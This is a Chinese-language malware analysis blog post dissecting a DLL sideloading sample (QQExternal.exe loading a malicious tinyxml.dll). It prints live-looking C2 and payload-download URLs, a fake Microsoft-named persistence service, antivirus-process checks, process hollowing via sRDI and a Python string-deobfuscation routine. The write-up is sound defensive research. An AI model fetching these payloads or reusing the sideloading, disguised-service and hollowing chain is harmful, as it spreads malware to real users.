目录
基本信息
QQExternal.exe加载tinyxml.dll
伪造证书
pdb信息
E:\其它文件\InternetRedirectNew\tinyxmlHook\Release\tinyxml.pdb
dllmain
流程
创建服务
服务信息:
MicrosoftSetupSystemTask
Microsoft Setup Update System Network Task
Microsoft 安装更新系统任务。请勿阻止或禁用这项服务,否则无法更新系统网络。
C:\ProgramData\Microsoft\Setup\QQExternal.exe
检查到360和卡巴斯基进程
直接发送http请求进入下一阶段
http请求:
http://[www.proxyconsole.com->ip]:8250/api.php?act=get_run_core&app=10001
(http://www.proxyconsole.com:8250/api.php?act=get_run_core&app=10001)
响应
eyJGaXJzdFNlbGVjdCI6MiwiQ29yZUZpbGUiOlt7IlR5cGUiOjEsIkVuYWJsZSI6dHJ1ZSwiQWRkcmVzcyI6Imh0dHBzOi8vcHJvLXJlczEub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS9SdW4vUHVwcGV0TGliLmRsbCIsIkhhc2giOiI1NjczNzZBMDJFMDBBNTk1ODc0RjU3NzY3ODRFMjM4RCJ9LHsiVHlwZSI6MiwiRW5hYmxlIjp0cnVlLCJOYW1lIjoiUVFFeHRlcm5hbC5leGUiLCJBZGRyZXNzIjoiaHR0cHM6Ly9wcm8tcmVzMS5vc3MtY24taGFuZ3pob3UuYWxpeXVuY3MuY29tL1J1bi9RUUV4dGVybmFsLmV4ZSIsIkhhc2giOiJBODI1M0E4NDJDMEFENkM0MDZEMDc3MEMxNDgzQjkwRCIsIlJlbHlPbk5hbWUiOiJDaGFuZ1RvQXZpRGxsUW1lV2ViLmRsbCIsIlJlbHlPbkFkZHJlc3MiOiJodHRwczovL3Byby1yZXMxLm9zcy1jbi1oYW5nemhvdS5hbGl5dW5jcy5jb20vUnVuL0NoYW5nVG9BdmlEbGxRbWVXZWIuZGxsIiwiUmVseU9uSGFzaCI6IjcwRTYwMThDQTA4OUJGN0IwM0FBREVDMTQ5RDk4NkZEIn0seyJUeXBlIjozLCJFbmFibGUiOnRydWUsIk5hbWUiOiJEaXMuZXhlIiwiQWRkcmVzcyI6Imh0dHBzOi8vcHJvLXJlczEub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS9SdW4vRGlzLmV4ZSIsIkhhc2giOiI3QzQ3N0IzNzg1RUMxOTgwMDE0QjZDQURENEM2MEMwOCIsIkNvbW1hbmRMaW5lIjoiR29Hb0dvIn1dfQ==
base64解码后
{
"FirstSelect": 2,
"CoreFile": [{
"Type": 1,
"Enable": true,
"Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/PuppetLib.dll",
"Hash": "567376A02E00A595874F5776784E238D"
}, {
"Type": 2,
"Enable": true,
"Name": "QQExternal.exe",
"Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/QQExternal.exe",
"Hash": "A8253A842C0AD6C406D0770C1483B90D",
"RelyOnName": "ChangToAviDllQmeWeb.dll",
"RelyOnAddress": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/ChangToAviDllQmeWeb.dll",
"RelyOnHash": "70E6018CA089BF7B03AADEC149D986FD"
}, {
"Type": 3,
"Enable": true,
"Name": "Dis.exe",
"Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/Dis.exe",
"Hash": "7C477B3785EC1980014B6CADD4C60C08",
"CommandLine": "GoGoGo"
}]
}
未检测到
通过sRDI(原dllTools.dll)调用CreateHollowedProcess
第二次通过sRDI执行http下载工作,代码与tinyxml.dll中一致
在第二次sRDI加载的pe中出现json库信息
E:\其它文件\InternetRedirectNew\Puppet
字符串混淆方式
字符串混淆方式:
非常明显的“C++编译时字符串加密”,国外很早就讨论了c++ - Compile-time string encryption - Stack Overflow
def xorfunc(buf:bytes,count:int,xorx,xory):
ret=b''
x,y=tuple(struct.pack('<2B',xorx,xory))
for i in range(count):
ret+=struct.pack('<B',x^((buf[i]-y)&0xff))
return ret
载荷存储服务器
https://pro-res1.oss-cn-hangzhou.aliyuncs.com
标签:劫持,exe,http,aliyuncs,dll,tinyxml,com From: https://www.cnblogs.com/DirWang/p/17052636.html